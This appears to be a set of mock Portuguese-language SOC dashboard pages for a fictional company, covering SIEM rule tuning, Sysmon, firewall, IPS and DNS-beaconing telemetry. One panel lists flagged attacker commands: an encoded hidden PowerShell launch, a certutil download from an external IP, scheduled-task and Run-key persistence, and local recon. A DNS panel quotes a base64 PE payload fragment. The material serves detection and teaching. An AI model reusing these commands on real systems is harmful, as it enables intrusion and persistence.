EV-06 · 6 de 17
Grupo Vetria / Segurança & SOC / Regras & Tuning SIEM
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Tabelão de Regras · console do ruleset
wzh-mgr-01/02 · /var/ossec/etc/rules/ · 3.428 regras · 186 vet-* · 41 em tuning · ord. hits 24h▸visão salva: fila_triagemrule.level>=10 AND NOT rule.groups=fp_reviewíndice wazuh-alerts-4.x-* · 206/214 fontes ok · atraso máx 38 s
rule.iddescrição · contexto do último matchlvlmitrehits 24htend. 24hfp %p50estado
vet-100021
L12
T1110
18.442
4,1%
0,9 ms
ATIVA
4625 burst >50/5 min por srcip → vpn-forti-01
96 rajadas · srcip 203.0.113.44/.51 · filho de 60122 · dispara PB-03
60122
L10
T1110.003
18.442
2,2%
0,6 ms
ATIVA
4625 · falha de logon — usuário ou senha inválidos
base win_authentication_failed · 6 DCs · pico 1.208/h · 03h10
5710
L7
T1110
14.882
44,6%
0,5 ms
TUNING
sshd: tentativa de login com usuário inexistente
face de gestão 10.20.8.0/28 · sondas a cada 60 s no ruído · TK-30455
5712
L10
T1110.001
1.204
11,8%
0,7 ms
TUNING
sshd: força bruta — 8 falhas em 120 s
srv-bkp-01 · srv-arq-01 · proposta: threshold 12/120 s (TK-30301)
vet-100052
L12
T1558.003
312
6,1%
1,4 ms
ATIVA
Kerberos 4769 com cifra RC4 (0x17) p/ SPN em watch
3 SPNs: svc-protheus · svc-nfe · svc-arquivos · suspeita kerberoasting
92032
L12
T1218
61
18,4%
3,1 ms
TUNING
Sysmon EID1: LOLBin com linha de comando ofuscada
pai explorer.exe · flags -enc / -nop / ^ · 610 hosts da fábrica no escopo
vet-100047
L13
T1071.004
12
8,3%
4,2 ms
ATIVA
DNS: domínio novo com DGA-score > 0,8
41M consultas/24h · entropia >3,9 + feed MISP · TTL 300 · 12 domínios
vet-100008
L11
T1543.003
6
33,3%
1,1 ms
TUNING
7045: serviço novo fora de janela de GMUD
só srv-* · ImagePath fora de C:\Windows\System32\ · 6 eventos/24h
31151
L10
T1595.003
0
61,2%
—
SILENCIADA
web: rajada de 404 — varredura em portal-vetria
silenciada 12/07 · TK-30219 · era 2.408/dia · monitor externo no ruído
vet-100034
L14
T1059.001
0
0,0%
2,8 ms
ATIVA · 0142
sequência: powershell -enc -nop → rundll32 (EID1→EID3)
último match qui 17/07 14h09 · wks-fab-104 · sha256 9f2a71…c44b → EV-2026-0142
decisão do plantão: Douglas M. assume o tuning de 31151 + 5710 nesta semana · TK-30455 · entra na GMUD do SIEM sáb 26/07 22h · aprova: Renata C.
Pipeline de Avaliação · wazuh-analysisd
wzh-mgr-01 (master) · wzh-mgr-02 (worker) · p50 por estágio · 24hfila analysisd sem descarte em 24h · alarme se uso > 85% · dono da plataforma: Túlio B. · TK-30390 aberto p/ janela de backup
Top Ruído × Top Valor · 30 dias
alertas por regra × desfecho dos 218 casos · ITSM · FP% no fechamentoTOP RUÍDO · CANDIDATAS A TUNINGFP%
31151404 em massa · portal-vetria61,2%
causa: monitor externo (2 IPs) · TK-30219 · Douglas M.
5710ssh usuário inexistente44,6%
causa: sondas de gestão 60 s · TK-30455 · Douglas M.
vet-1000087045 fora de GMUD33,3%
causa: agente de patch WSUS · TK-30470 · Aline F.
92032LOLBin ofuscado18,4%
causa: instalador NSIS assinado · TK-30482 · Túlio B.
5712força bruta sshd11,8%
causa: threshold 8/120 s baixo · TK-30301 · Marcos P.
TOP VALOR · GEROU CASO CONFIRMADOvínculo
vet-100034ps -enc → rundll32EV-2026-0142
ransomware contido · MTTC 42 min · qui 17/07 14h05
vet-100021burst 4625 por srcipEV-0137
password spray · bloqueio preventivo · 1h50 p/ conter
vet-100047DGA / beaconing DNSCS-2199
beacon confirmado (0142) + 2 em análise · CS-2205
60122falha de logon · 4625EV-0129
credencial válida reutilizada · contida em 9 min
vet-100052RC4 p/ SPN · 4769CS-2181
kerberoasting: 3 SPNs em watch · rotação de senha em GMUD
critério VALOR: caso confirmado vinculado no ITSM · critério RUÍDO: % fechado como FP · revisão quinzenal do ruleset — próx. sex 01/08
Distribuição de Alertas por Level
wazuh-alerts-4.x-* · terms rule.level · 24h · y: alertas/24h · log₁₀10⁶10⁴10²10⁰
zona de triagem · rule.level ≥ 10Σ = 347 · alertas de hoje na fila
3456789101112131415
Cobertura MITRE do Ruleset
rule.mitre.tactic · 3.428 regras · ruleset de 20/07Acesso Inicial246T1566 · 64
Execução402T1059 · 96
Persistência342T1543 · 71
Esc. de Privilégio204T1055 · 38
Evasão de Defesa388T1218 · 84
Credenciais486T1110 · 118
Descoberta232T1046 · 52
Mov. Lateral218T1021 · 66
Coleta156T1005 · 31
Comando & Controle298T1071 · 88
Exfiltração132T1048 · 29
Impacto124T1486 · 42
3.228 de 3.428 mapeadas · 200 sem rule.mitre.id (backlog TK-30501 · Yasmin R.) · T1110 concentra 118 regras
Fila de Tuning · semana 29
41 em tuning · 6 nesta semana · GMUD sáb 26/07 22hregramotivo do ajustefp% antes→depoisdonoprazo
31151whitelist do monitor externo (2 IPs)61,2% → 8%Douglas M.seg 21/07
5710ignorar sondas 10.20.8.0/2844,6% → 12%Douglas M.ter 22/07
vet-100008correlacionar 7045 com GMUD aberta33,3% → 5%Aline F.qua 23/07
92032exceção p/ assinaturas NSIS válidas18,4% → 6%Túlio B.qua 23/07
5712threshold 8 → 12 falhas/120 s11,8% → 7%Marcos P.qui 24/07
vet-100019beacon: excluir CDNs do feed MISP9,4% → 3%Yasmin R.sex 25/07
janela de mudança do SIEM: sáb 26/07 22h–00h · rollback automático se alerta/h desviar >30% · aprova: Renata C.
Wazuh 4.9 · cluster wzh-mgr-01/02 · 3.428 regras (186 custom) · 1.912 decoders · janela 24h · Grupo Vetria · dom 20/07 15:12
EV-07 · 7 de 17
Grupo Vetria / Segurança & SOC / Telemetria Sysmon
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Rio de Eventos Sysmon · 24h por Event ID
Sysmon v15 config v4.1 → Wazuh agent → wzh-mgr-01/02 · 14,5M ev/24h · méd 168 EPS
EID 3 · rede 5,1M
EID 22 · DNS 3,6M
EID 1 · processo 2,4M
EID 11 · arquivo 1,8M
EID 13 · registro 920k
EID 7 · imagem 640k
EID 10 · acesso proc. 84k
empilhado · milhões de eventos/h
2,0 M/h1,51,00,50
14,5Meventos Sysmon · 24h
4.037 agentes reportando
4.037 agentes reportando
pico 1,97M ev/h · 02h30 ≈ 546 EPS
backup (svc-backup · fita 02h) + varredura
backup (svc-backup · fita 02h) + varredura
full-scan EDR · dom 03h · EID 7/10 ↑
vale 0,31M ev/h · 05h30
domingo · expediente reduzido · platô 0,58M ev/h · fábrica em turno
15h12 ▾ agora
00h04h08h12h16h20h24h
✎ silhueta = 7 EIDs habilitados na config v4.1 · sem deriva vs baseline 7d (+2,3%) · EID 5/17/18 desabilitados por ruído — tuning TK-29984 · dona: Renata C.
Parent → Child fora do baseline · EID 1
Wazuh rules vet-* (186 custom) · baseline 30d por par · 8 pares em watchprocesso pai → filho · regra30 d24hbase 30dΔhostsveredito
winword.exe→powershell.exe
vet-1042 · nível 12 · pai Office + filho shell + flag -enc
3
0,1/d
+30×
wks-fab-104 · -109 EV-2026-0142 · qui 17/07
BLOQUEADO
excel.exe→cmd.exe
vet-1043 · nível 10 · macro XLM → shell
1
0,3/d
+3,3×
wks-fab-107 · macro de planilha fiscal
EM ANÁLISE
outlook.exe→wscript.exe
vet-1045 · nível 10 · anexo → script host
1
0,2/d
+5×
wks-fab-112 · .js em anexo zip
EM ANÁLISE
services.exe→rundll32.exe
vet-1048 · nível 8 · serviço novo → LOLBin (correlato 7045)
2
1,8/d
+11%
dc-mtz-01 · srv-arq-01
EM ANÁLISE
w3wp.exe→cmd.exe
vet-1046 · nível 14 · canário de webshell · DMZ
0
0/d
=
portal-vetria · zero é o esperado
ESPERADO
mshta.exe→*
vet-1047 · nível 12 · HTA negado por ASR D4F940AB-401B
0
0/d
=
frota toda · política ASR em bloqueio
ESPERADO
explorer.exe→powershell.exe
vet-1049 · nível 5 · scripts de logon GPO · assinados
214
189/d
+13%
61 hosts · matriz + fábrica em turno
ESPERADO
wmiprvse.exe→cmd.exe
vet-1050 · nível 5 · inventário SCCM · janela 12h/12h
38
34/d
+12%
22 hosts · coleta das 12h
ESPERADO
✎ par 01: EDR mata o filho pós-spawn (engine de comportamento) e o EID 1 registra · ASR "Office → filho" passa a bloqueio na GMUD-4471 · qua 23/07 · TK-30398 · dono: Douglas M.
Top Comandos Sinalizados · EID 1
EDR + vet-* · 23 detecções/24h · comportamento 11 · assinatura 8 · ML 4powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0…BLOQUEADO3 exec·wks-fab-104 · -109·vet-1042·sha256 9f2a71…c44b·hash 1/8 do EV-0142
rundll32.exe C:\Users\Public\upd.dll,StartBLOQUEADO2 exec·wks-fab-104·vet-1044 · DLL não assinada em path de usuário·hash 2/8
certutil.exe -urlcache -split -f http://203.0.113.88/a.txtEM ANÁLISE1 exec·srv-arq-01·vet-1051 · LOLBin download·correlaciona c/ ALR-8846 (SMB)
wmic.exe process call create "cmd /c whoami /all"EM ANÁLISE2 exec·wks-fab-107·vet-1053 · recon local pós-macro·mesma origem do par excel→cmd
schtasks.exe /create /tn WinUpdt /tr C:\Users\Public\upd.exe /sc onlogonBLOQUEADO1 exec·wks-fab-112·vet-1061 · persistência·correlato 4698 (11 tasks novas/24h)
reg.exe add HKCU\…\CurrentVersion\Run /v upd /d C:\Users\Public\upd.exeEM ANÁLISE1 exec·wks-fab-112·vet-1060 · RunKey via EID 13 (920k/24h)·TK-30419
✎ quarentena: 7 arquivos/24h · 34 exclusões ativas — 3 arriscadas em revisão · TK-30388 · dona: Aline F.
DNS do Endpoint · EID 22
3,6M ev/24h · 214 domínios <30d · 12 DGA > 0,8 · corp 41M cons/24hdomínio resolvido fora do proxycons 24hidadeHdgaveredito
kz4hj2n8-pay[.]top
resolve 203.0.113.88 · C2 do EV-0142
412
4d
3,94
0,94
BLOQUEADO
cdn-updt7[.]xyz
beacon Δt 60s ±2s · wks-fab-109
118
11d
3,58
0,86
EM ANÁLISE
mx-relay-brz[.]info
beacon Δt 300s · srv-mail-01
96
22d
3,31
0,71
EM ANÁLISE
api-clima-jdi[.]com.br
estação IoT da fábrica · painel OT
1.204
2a
2,88
0,22
ESPERADO
time.windows.com
NTP direto · 388 hosts
38,4k
—
2,41
0,04
ESPERADO
wpad.vetria.corp
NXDOMAIN legado · GPO pendente
8,4k
—
2,10
0,02
ESPERADO
✎ beaconing: 1 confirmado (EV-0142 · bloqueado) + 2 em análise · FFT janela 6h · TK-30421 · dono: Túlio B.
Integridade da Telemetria
wzh-mgr-01/02 cluster · 3.428 regras · 186 vet-* · 41 em tuning · 1.912 decodersagentes reportando
4.037/4.112
98,2% · p95 6s · p50 1,8s
sem reporte >24h
75
62 filiais · 13 matriz
sem sysmon
12 +76 rollout
Win7 legado · VLAN OT
eventos 24h
14,5M
méd 168 · pico 546 EPS
sysmonconfig-vetria-v4.1.xml · sha256 b7e4c2…91af · 74 regras include/exclude · assinada 14/07 · GPO GPO-SEC-14
EID habilitados: 1 · 3 · 7 · 10 · 11 · 13 · 22 · exclusões: named pipes Protheus · 12 paths de build
EID habilitados: 1 · 3 · 7 · 10 · 11 · 13 · 22 · exclusões: named pipes Protheus · 12 paths de build
15/07 09h14push v4.1 via GPO-SEC-14 → 3.988 ok · 37 aguardam reinícioATIVA
30/06 22h10v4.0 → exclui pipes do Protheus · −22% de ruído vs v3.9HISTÓRICO
02/06 21h40hotfix v3.9b → corrige EID 22 ausente no Server 2012 (srv-arq-01)HISTÓRICO
✎ 12 Win7 sem Sysmon: NDR compensa na VLAN OT · rollout dos 76 até 31/07 · TK-30401 · dono: infra endpoint
Sysmon v15 config v4.1 (custom) → Wazuh agent · 4.037 hosts · 14,5M eventos/24h · Grupo Vetria · dom 20/07 15:12
EV-08 · 8 de 17
Grupo Vetria / Segurança & SOC / SESSÕES DE FIREWALL
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Tail de Sessões — o que atravessa a borda agora
syslog fgt-mtz-01 (traffic-forward) → Wazuh · enriquecido: GeoIP · feed TI · JA3 · R-163 com tráfego vivo▸ filtro:action!=permit OR policyid IN (163,141) OR watch=true · últimos 90 s128,0k sessões ativas · 2.410 novas/s · syslog 4,1k msg/s
horaorigemdestinoprotopolicyaçãoaplicaçãobytes ↑ ↓duraçãogeoenriquecimento · decisão
15:12:03
203.0.113.201:44873→10.20.30.40:8443
TCPR-163PERMIT
SSL/TLSv1.2
↑ 18,4 KB ↓ 122,7 KB
00:04:11BR
poro órfão 2019 · dst fora do inventário · cert autoassinado CN=upd-portal · fechar: GMUD 2299 (ter 22/07) · TK-30401
15:12:02
203.0.113.44:60112→203.0.113.2:3389
TCPR-141DENY
RDP
↑ 60 B ↓ 0 B
00:00:00BR
spray desde 03h10 · pico 1.208/h · par .51 mesmo padrão · watchlist TI · correlação com 4625 em vpn-forti-01
15:12:02
10.20.61.104:49331→203.0.113.74:8443
TCPR-198DENY
SSL (JA3)
↑ 517 B ↓ 0 B
00:00:00US
wks-fab-104 · beacon 300 s ±2 · JA3 51c64c77…9e2b · ALR-8841 em análise · Douglas M. · prazo 15h40
15:12:01
10.20.2.11:55214→198.51.100.20:443
TCPR-029PERMIT
NFe-SOAP/TLS
↑ 2,1 MB ↓ 684 KB
00:00:41BR
◉srv-erp-01 → SEFAZ-SP · autorização NF-e · crítico p/ faturamento (R$ 138k/h) · fluxo fixado
15:11:59
192.0.2.77:51023→10.20.30.21:443
TCPR-012PERMIT
HTTPS/H2
↑ 214 KB ↓ 1,8 MB
00:02:19BR
◉cliente B2B → portal-vetria via vip-portal-443 · health 2/2 UP · 4,2M sessões/24h
15:11:58
203.0.113.99:*→10.20.30.21:443
TCPR-012RATE-LIM
HTTPS
↑ 40 B ↓ 0 B
00:00:00—
SYN sem ACK · syn-cookie ativo · 1,2k half-open agora · ver painel de estados · residual do scan 02h04
15:11:57
198.51.100.23:5060→203.0.113.2:5060
UDPR-000DENY
SIP
↑ 424 B ↓ 0 B
00:00:00NL
scanner SIP (OPTIONS) · 2,1k/h · deny implícita · nenhum serviço SIP publicado na borda
15:11:56
10.20.1.10:40112→198.51.100.53:53
UDPR-031PERMIT
DNS
↑ 1,1 KB ↓ 4,3 KB
00:00:00US
◉dc-mtz-01 → forwarder · só DCs saem em 53 · demais hosts: sinkhole R-208 · 41M consultas/24h
15:11:55
203.0.113.117:44001→203.0.113.2:23
TCPR-009DENY
Telnet
↑ 60 B ↓ 0 B
00:00:00CN
SYN scan 1–1024 · 74% do deny CN nas 24h · geo-block ativo desde a GMUD 1980
15:11:54
10.20.2.40:51820→10.30.8.20:9401
TCPR-077PERMIT
Veeam-Repl
↑ 412,3 GB ↓ 1,9 GB
13:07:22—
◉srv-bkp-01 → DR nuvem · aberta 02h04 · elefante nº 1 das 24h · shaping classe bulk 40% fora da janela 01h–04h
15:11:52
10.34.8.9:33012→203.0.113.2:443
TCPR-003DENY
—
↑ 60 B ↓ 0 B
00:00:00—
bogon RFC1918 chegando na wan1 · ttl=64 · anti-spoof · 44/h · upstream notificado TK-30395
15h09 · Túlio B.: fechar R-163 na GMUD 2299 (ter 22/07 22h) · aprovação pendente: infra-web · TK-30401 — mitigação até lá: watchlist TI no 203.0.113.201 + captura pcap 15 min anexada ao ticket
Top Talkers · 24 h
NetFlow fgt-mtz-01 → Wazuh · total borda 1,08 TBsrv-bkp-01→dr-nuvem (10.30.8.20)
Veeam-Repl38,2%janela 01h–04h
412,3 GBda banda 24h
srv-arq-01→dc-spo-01
SMB/DFS-R11,0%
118,4 GBreplicação DFS
portal-vetria←clientes B2B (inbound)
HTTPS/H29,0%
96,7 GB4,2M sessões
srv-mail-01→MTAs externos
SMTP/TLS3,8%
41,2 GB84k sessões
srv-wsus-01←CDN Microsoft
MS-Update3,6%sync dom 14h · em curso
38,9 GBcatálogo + pacotes
dc-mtz-01⇄dc-jdi-01
AD-Repl RPC/4452,1%
22,4 GBintra-site VPN
guest-wifi→streaming (10.20.90.0/24)
QUIC/4431,7%shaping 20 Mbps
18,7 GBclasse guest
srv-erp-01→SEFAZ-SP (198.51.100.20)
NFe-SOAP0,9%
9,8 GBvolume baixo · crítico
top-8 = 70,3% do total · shaping bulk 40% fora da janela — GMUD 2278 · dono: infra-redes
Estado & Protocolo
conntrack fgt-mtz-01 · 128,0k ativasestados agoralargura ∝ log₁₀
TCP ESTABLISHED75,3%96,4k
UDP assoc14,2%18,2k
TCP TIME_WAIT/FIN7,7%9,8k
Túneis ESP/GRE1,2%1,5k
TCP SYN_RECV (half-open)scan 02h04 · rate-limit1,2k
ICMP0,7%0,9k
novas sessões por segundo · 24 hfgt-mtz-01
6,0k/s3,0k/s0
2.410/snovas agora · 15h12
02h04 · 6,1k/s SYN scan · TK-30388 ▸
03h10 · bump spray RDP
15h19h23h03h07h11h15h12
half-open normal <400 · 1,2k é residual do scan 02h04 · syn-cookie confirmado por Marcos P. 08h15 · sem ação pendente
NAT & Pools
SNAT/PAT + VIPs · fgt-mtz-01 · 64,5k portas/IPpools snat · uso de portas (PAT)
snat-corp203.0.113.10–.11
61%
79,9k/131,0k
estável · headroom ok
snat-guest203.0.113.12 · 1 IP
83%
54,4k/65,5k
exaure ~19h hoje · TK-30427
snat-vpn203.0.113.15 · 1 IP
34%
22,3k/65,5k
estável
snat-fab-ot203.0.113.14 · 1 IP
12%
7,9k/65,5k
só janela GMUD
vips publicados · health-check 5 s
vip-portal-443203.0.113.6:443 → 10.20.30.21:443
2/2 UP · 4,2M/24hpersist: cookie
vip-mail-25203.0.113.6:25 → 10.20.30.28:25
1/1 UP · 84k/24h
vip-vpnssl-10443203.0.113.5:10443 → vpn-forti-01
UP · alvo do spray4625 pico 03h10
snat-guest 83% às 15h12 · alarme em 85% · proposta: +1 IP no pool — GMUD 2301 (qua 23/07) · dono: infra-redes
Deny Storms · top origens
deny/h · 24 h · GeoIP + feed TI203.0.113.117GEO-BLOCK4,4k/h
AS65501 CN · SYN scan portas 1–1024 · constante nas 24 h
198.51.100.23DENY IMPLÍCITA2,1k/h
AS65517 NL bulletproof · SIP OPTIONS 5060/5061 · rajadas
203.0.113.44WATCHLIST TI341/h
AS65530 · spray RDP → vpn-forti-01 (3389/10443) · pico 1.208/h 03h10
203.0.113.51WATCHLIST TI214/h
AS65530 · mesmo /24 do .44 · sincronizado · pico 986/h 03h10
10.34.8.9ANTI-SPOOF44/h
bogon RFC1918 na wan1 · ttl=64 · upstream notificado · TK-30395
R-141 (deny+log RDP) criada 18/07 · GMUD 2291 · dono: infra-redes — 203.0.113.88 (C2 do EV-0142): 0 hits há 62h · IOC block válido
FortiGate fgt-mtz-01 (HA) syslog → Wazuh · 214 policies · 128,0k sessões ativas · amostra 90 s · Grupo Vetria · dom 20/07 15:12
EV-09 · 9 de 17
Grupo Vetria / Segurança & SOC / IPS & Assinaturas
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Matriz Assinatura × Hora — o que bate na porta
fgt-mtz-01/02 → syslog → Wazuh · type=utm subtype=ips action IN (dropped,detected) · 24hEventos IPS · 24h12.34811.960 drop · 388 alert p/ SIEM
Ritmo agora · 15h12512/hmédia 24h 514/h · dom −8% vs sáb
Críticos triados1411 Citrix Bleed · 3 DNS tunnel
Cluster 02h–04h34%4.229 ev em 3h · origem 203.0.113.0/24
2,0k1,5k1,0k0,5k0
ev/h · bin 1h
pico 1.879 ev/h · 03h · varredura coordenada 203.0.113.0/24
cluster 02h–04h · 4.229 ev · 34% do dia
▾ agora · 512 ev/h
média 24h · 514 ev/h
00h04h08h12h16h20h23h
assinatura · regra
00
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15▾
16
17
18
19
20
21
22
23
24h
ação
alvo típico
ET SCAN Nmap -sS
SID 2000537 · ET SCAN
96
104
238
325
212
141
98
88
112
126
131
138
121
109
134
141
122
118
104
96
89
84
118
139
3.184
drop
fgt-mtz-01borda · todas portas
RDP brute-force
SID 2023753 · ET POLICY MS-RDP
64
71
456
512
398
104
52
41
46
52
58
61
48
44
57
61
52
49
44
41
38
36
49
58
2.492
drop
vpn-forti-01TCP 3389 · spray /24
SQLi UNION SELECT genérico
SID 2006445 · ET WEB_SERVER
41
38
64
71
58
49
52
66
98
112
118
121
104
98
116
128
108
102
88
72
64
52
71
95
1.986
drop
portal-vetriaTCP 443 · /busca
Log4Shell ${jndi: probe
SID 2034647 · CVE-2021-44228
34
41
186
338
142
52
31
28
34
38
41
44
36
31
39
44
38
34
31
28
26
24
31
37
1.408
drop
portal-vetriaheaders HTTP
PHPUnit RCE
SID 2025731 · CVE-2017-9841
28
31
138
158
71
38
24
22
28
31
34
36
31
28
34
38
31
29
26
24
22
20
28
34
984
drop
portal-vetria/vendor/phpunit
ThinkPHP RCE
SID 2026731 · ET WEB_SPECIFIC
22
24
74
176
61
31
19
18
22
26
28
31
26
22
28
31
26
24
21
19
17
16
22
28
812
drop
portal-vetria/index.php?s=
SMBGhost scan
SID 2029994 · CVE-2020-0796
18
21
52
128
44
26
16
14
17
19
21
22
19
17
21
23
19
18
16
14
13
12
17
21
608
drop
borda mtzTCP 445 · fechado
PAN-OS GlobalProtect cmd inj
SID 2051156 · CVE-2024-3400
14
16
41
112
34
19
12
11
14
16
17
18
15
13
16
18
15
14
12
11
10
9
13
16
486
drop
borda mtzsem PAN-OS
Citrix Bleed
SID 2049097 · CVE-2023-4966 11 crit
·
6
31
44
26
9
·
·
6
8
9
11
8
6
12
14
8
6
·
·
·
·
·
·
234
alert
adc-ctx-01DMZ · TCP 443
DNS tunnel suspect (iodine)
SID 2027757 · ET POLICY DNS 3 crit
·
·
12
15
12
·
·
·
6
7
8
9
7
6
9
14
7
6
·
·
·
·
·
6
154
alert
saída DNSNULL/TXT · >52 chars
drop · sem alvo interno
alvo em análise
alvo presente
alert · investigação
heat normalizado por linha · célula <6 ev = «·» · 15▾ = agora
✎ decisão do plantão: 2049097 (Citrix Bleed) em alert até o patch do adc-ctx-01 — VU-2214 · GMUD-1189 qui 24/07 22h · dono: infra-redes · Túlio B. revalida pós-GMUD
Funil do Sensor · pacote → veredito
fgt-mtz-01/02 · IPS inline (fail-close) · janela 24h9,4 Gbpsinspecionado inline
≈ 101 TB no dia · pico 9,8 Gbps · 02h04
12.348matches · 24h
11.960drop na borda
388
alert → Wazuh SIEM
14críticos triados
▸ 1 match a cada ≈8,2 GB
▸ 96,9% morre na borda
▸ 3,1% vira alert
▸ 3,6% dos alerts
decisão por pacote: p50 42 µs · p99 118 µs
bypass/fail-open 24h: 0 · fail-close armado
bypass/fail-open 24h: 0 · fail-close armado
drop não vira caso: só os 388 alert entram na fila do SIEM · dos 14 críticos, 11 são Citrix Bleed (tabela abaixo)
Tentativas × Exposição — temos o alvo?
IPS × inventário de vulns · scanner qui 22h · 1.842 CVEs abertos · KEV 17assinatura · CVE24htent.temos o alvo?veredito · vínculo
Citrix Bleed
SID 2049097 · CVE-2023-4966
234
SIM · ALVO PRESENTEadc-ctx-01 · 13.1-49.13
PRIORIDADE
VU-2214 · patch GMUD-1189 · qui 24/07 22h
Log4Shell ${jndi: probe
SID 2034647 · CVE-2021-44228
1.408
EM ANÁLISE2 apps legadas Java
VALIDANDO
TK-30455 · SCA srv-arq-01 · resp. qua 23/07
RDP brute-force
SID 2023753 · ET POLICY MS-RDP
2.492
NÃORDP não exposto · NLA
RUÍDO NA BORDA
spray 4625 · 203.0.113.44/.51 · ver EV-04
PHPUnit RCE
SID 2025731 · CVE-2017-9841
984
NÃOportal-vetria é stack .NET
RUÍDO
sem PHP exposto · drop mantido · custo zero
SMBGhost scan
SID 2029994 · CVE-2020-0796
608
NÃO445/TCP fechado na borda
RUÍDO
fechado 05/2020 · regra R-089
PAN-OS GlobalProtect cmd inj
SID 2051156 · CVE-2024-3400
486
NÃOsem PAN-OS no parque
RUÍDO
no catálogo KEV · varredura oportunista
ruído ≠ desligar: drop na borda custa zero · Aline F. revê o threshold do 2034647 quando TK-30455 fechar
Pacotes & Performance do Sensor
fgt-mtz-01 ativo · HA a-p c/ fgt-mtz-02 · SNMP + REST · 60 sThroughput inspec.9,4 Gbpspico 9,8 · 02h04 · full-inspect
Sessões simultâneas214,6knovas 8,4k/s · limite 2,0M
CPU engine IPS34%p95 61% às 02h · 16 cores NP7
Latência inline42 µsp50 · p99 118 µs · budget 500 µs
Bypass / fail-open024h · teste de HA: GMUD-1142 ✓
Assinaturas ativas9.4128.978 alert · 434 drop alta conf.
pacote ET Pro: sáb 19/07 23h14 ✓ · +38 novas · 12 revisadas · 3 depreciadas · próxima ~21h (diário)EM DIA
IPS FortiGate inline + regras ET Pro · 9.412 assinaturas · 12,3k eventos/24h · update diário · Grupo Vetria · dom 20/07 15:12
EV-10 · 10 de 17
Grupo Vetria / Segurança & SOC / DNS & Egress
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Dispersão Entropia × Frequência · domínios consultados
dns.log dc-jdi-01/02 · dc-spo-01 + Sysmon EID 22 (3,6M/24h) → Wazuh»query: rule.group=dns AND (entropy(qname) ≥ 3,8 OR first_seen < 30d) AND NOT allowlist·12,6M consultas externas · 12,4k qnames únicos · 1 ponto = 1 domínio
✎ xj3k9f[.]top no sinkhole 10.20.99.99 desde 17/07 14h47 · bloqueio do IP novo (.74) replicado nas 38 filiais 15h09 (PB-03) · TK-30455 · Douglas M.
Beaconing · Regularidade de Saída
NetFlow fgt-mtz-01 + Sysmon EID 3 → regra vet-100482»vet-100482: stddev(Δt)/avg(Δt) < 0,01 AND stddev(bytes_out) < 64 B AND n ≥ 200 · 24h
hostdestinopulso 24hΔt médjitterbytes/req1ª vezveredito
wks-fab-104
fábrica Jundiaí · OT
203.0.113.74:8443
infra EV-0142 · IP .88→.74
300,0 s
σ 1,2 s
0,4%
1.184 B
σ 12 B
hoje
14h40
C2 · ALR-8841IP bloq 14h52 · PB-03
srv-mail-01
DMZ · SMTP
cdn-metrics[.]io
198.51.100.23:443 · TLS
60,0 s
σ 0,1 s
0,2%
642 B
σ 4 B
14/07
03h22
EM ANÁLISETK-30467 · Aline F.
pdv-fil07-03
filial 07 · PDV
telemetria-sync[.]net
198.51.100.77:443 · TLS
120,0 s
σ 1,0 s
0,8%
512 B
σ 18 B
hoje
09h14
EM ANÁLISETK-30474 · Yasmin R.
4.037 hosts
frota · agente NTP
a.st1.ntp.br
200.160.7.186:123 · UDP
64,0 s
σ 2,2 s
3,4%
90 B
σ 0 B
baseline
> 1 ano
LEGÍTIMONTP.br · allowlist
frota EDR
4.112 instalados
tlm.edr-cloud[.]com
198.51.100.9:443 · TLS
300,0 s
σ 15 s
5,1%
2,1 KB
σ 340 B
baseline
> 1 ano
LEGÍTIMOtelemetria AV · AL-19
srv-erp-01
DC JDI · Protheus
lic.protheus-upd[.]com
200.201.10.44:443 · TLS
900,0 s
σ 24 s
2,7%
1,4 KB
σ 96 B
12/03
GMUD 2044
LEGÍTIMOatualizador ERP
decisão do plantão: se TK-30467/30474 não fecharem até 18h00, destinos entram no sinkhole — aprovação Renata C. · legítimos documentados na AL-19
Consultas Raras · NXDOMAIN & TXT
dns.log · qtype TXT/NX · Sysmon EID 22 · PB-138.412NXDOMAIN · 24hpico 642/h · 02h10
214domínios <30 d9 allowlist · 12 DGA > 0,8
12TXT > 180 B2 fora de SPF/DKIM
TXT214 B
k2j9x.pull.xj3k9f[.]top
payload "TVqQAAMAAAAEAAAA//8AALgA…" · base64 → header MZ (PE)
BLOQUEADOhist. EV-0142
TXT198 B
_sig.telemetria-sync[.]net
payload "eyJob3N0IjoicGR2LWZpbDA3…" · base64 → {"host":"pdv-fil07-03"…}
EM ANÁLISETK-30474
TXT189 B
vetria.com.br
payload "v=spf1 include:spf.protection.outlook.com ip4:200.201.10.0/24 -all"
LEGÍTIMOSPF · e-mail
NX642/h
wks-fab-109 · rajada NXDOMAIN · 02h10
sufixos aleatórios .top/.xyz · candidato DGA sem C2 vivo · EID 22
EM ANÁLISETK-30469
NOVO6 d
atualizacao-vetria[.]com
registro 14/07 · MX + A ativos · typosquat de vetria.com.br
TAKEDOWNTK-30461
TXT > 180 B fora de SPF/DKIM abre caso automático (PB-13) · 12 hoje: 2 suspeitos · 10 legítimos (SPF/DKIM/verificação)
Egress Fora do Proxy · 443/53 direto
fgt-mtz-01 · policy-id 47 DENY-DIRECT · 24hhostdestino · protocolosessõesbytes outestado
wks-fab-104
fábrica Jundiaí
203.0.113.88:443
TLS sem SNI · JA3 e7d7…41aa
96
41,2 MB
HISTÓRICO · EV-0142qui 17/07 · reimagem 18/07
pdv-fil07-03
filial 07 · PDV
198.51.100.77:443
TLS 1.2 · JA3 raro 3f9a…c2d0
212
8,4 MB
EM ANÁLISEhoje 09h14 · TK-30474
srv-bkp-01
DC Jundiaí
203.0.113.9:53
DNS/UDP · resolver hardcoded
1.412
0,3 MB
EXCEÇÃO ABERTAGMUD-2291 · qua 23/07
wks-fab-107
fábrica Jundiaí
dns.cloud-dns[.]com:443
DoH · negado na policy 47
84
1,1 MB
